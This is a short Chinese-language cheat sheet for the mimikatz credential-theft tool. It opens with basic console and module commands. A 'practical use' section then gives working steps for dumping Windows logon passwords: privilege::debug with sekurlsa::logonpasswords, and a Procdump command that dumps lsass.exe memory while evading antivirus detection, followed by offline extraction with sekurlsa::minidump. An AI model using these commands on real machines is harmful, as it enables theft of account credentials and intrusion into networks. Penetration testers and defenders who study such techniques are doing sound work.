mimikatz
常规命令

1.常规的操作使用命令

mimikatz # cls         –>清屏,类似dos命令cls.

mimikatz # exit       –>退出mimikatz.

mimikatz #version  –>查看当前的mimikatz的版本.

随便输入”xxx::”，会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在，然后会列出所有可用的命令



查看列表中命令的具体参数同样可以输入”命令::”来查看，比如:”inject::”,如图：



可以看到命令inject的具体参数有pid,process,service等……

2.系统方面的操作使用命令:system

mimikatz #system::user  –>查看当前登录的系统用户

mimikazt #system::computer –>返回当前的计算机名称

3.在服务器终端的操作命令: ts

mimikatz #ts::sessions  –>显示当前的会话

mimikatz #ts::processes windows-d.vm.nirvana.local   –>显示服务器的进程和对应的pid情况等。

4.系统服务相关的操作使用命令:service

5.系统进程相关操作的使用命令:process

6.系统线程相关操作使用命令:thread

7.系统句柄相关操作使用命令:handle

8.加密相关操作使用命令:crypto

9.注入操作使用命令:inject

## 实际运用

#抓取密码命令-->适用于win10之前的版本系统（典型win10系统抓取不到密码明文）
privilege::debug
sekurlsa::logonpasswords

渗透环境运用类

①将密码的文件导出到本地,适用于mimikatz不免杀的情况下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp

②mimikatz进行抓取

sekurlsa::minidump c:\users\test\appdata\local\temp\lsass.dmp
sekurlsa::logonpasswords